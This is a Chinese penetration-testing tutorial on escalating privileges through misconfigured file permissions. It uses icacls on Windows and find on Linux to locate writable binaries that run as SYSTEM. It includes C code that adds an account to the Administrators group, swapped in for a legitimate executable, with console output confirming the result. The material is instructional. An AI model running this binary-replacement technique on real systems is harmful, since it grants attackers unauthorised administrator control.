渗透测试之提权：利用配置不当提权

一、概述

　　与漏洞提权相比，更常用的方法

• 企业环境
• 补丁更新的全部已经安装
• 输入变量过滤之外更值得研发关注的安全隐患
• 以system权限启动
• NTFS权限允许users修改删除

　　也就是说，通过查看哪些服务默认以system权限启动，NTFS权限允许users修改删除本身，可将其替换或绑定反弹shell程序等完成提权。

二、windows 系统

　　icacls 命令【windows 2003以后的系统中包含的程序】

　　　　查询某一文件的NTFS权限（F：完全控制权限），如：

icacls c:\windows\*.exe /save perm /T

 

　　上图RegSnap.exe（如 1 ）是符合条件的（FA;;;BU），虽然admin.exe也含有（FA;;;BU）（如 2） ，但由位置可知默认的普通用户对RegSnap.exe的权限（完全控制）高于对admin.exe的权限。为此可将RegSnap.exe作为修改或绑定目标。

备注：BU=BUILTIN\Users，默认的普通用户组

测试代码（admin.c=>admin.exe）

#include <stdlib.h>
int main()
{
   int i;
   i=system("net localgroup Administrators a /add");
   return 0;
}

将 admin.c 编译成 admin.exe 后，重命名为RegSnap.exe，替换原来的 RegSnap.exe，当 RegSnap.exe 执行后则 a 账户会被添加到管理员组，演示如下：

C:\Documents and Settings\Administrator\桌面>net user a
用户名                 a
……………………

本地组成员
全局组成员             *Domain Users
命令成功完成。


C:\Documents and Settings\Administrator\桌面>RegSnap.lnk

C:\Documents and Settings\Administrator\桌面>命令成功完成。


C:\Documents and Settings\Administrator\桌面>net user a
用户名                 a
…………………………

本地组成员             *Administrators
全局组成员             *Domain Users
命令成功完成。

三、Linux 系统

find 命令

如：

find / -perm 777 -exec ls -l {} \;

其他操作类似Windows 系统。

若渗透进去的是应用程序，则查应用系统的配置文件

• 通过应用连接数据库的配置文件，发现其连接的服务账号
• 后台服务运行账号【有可能root账号运行web服务】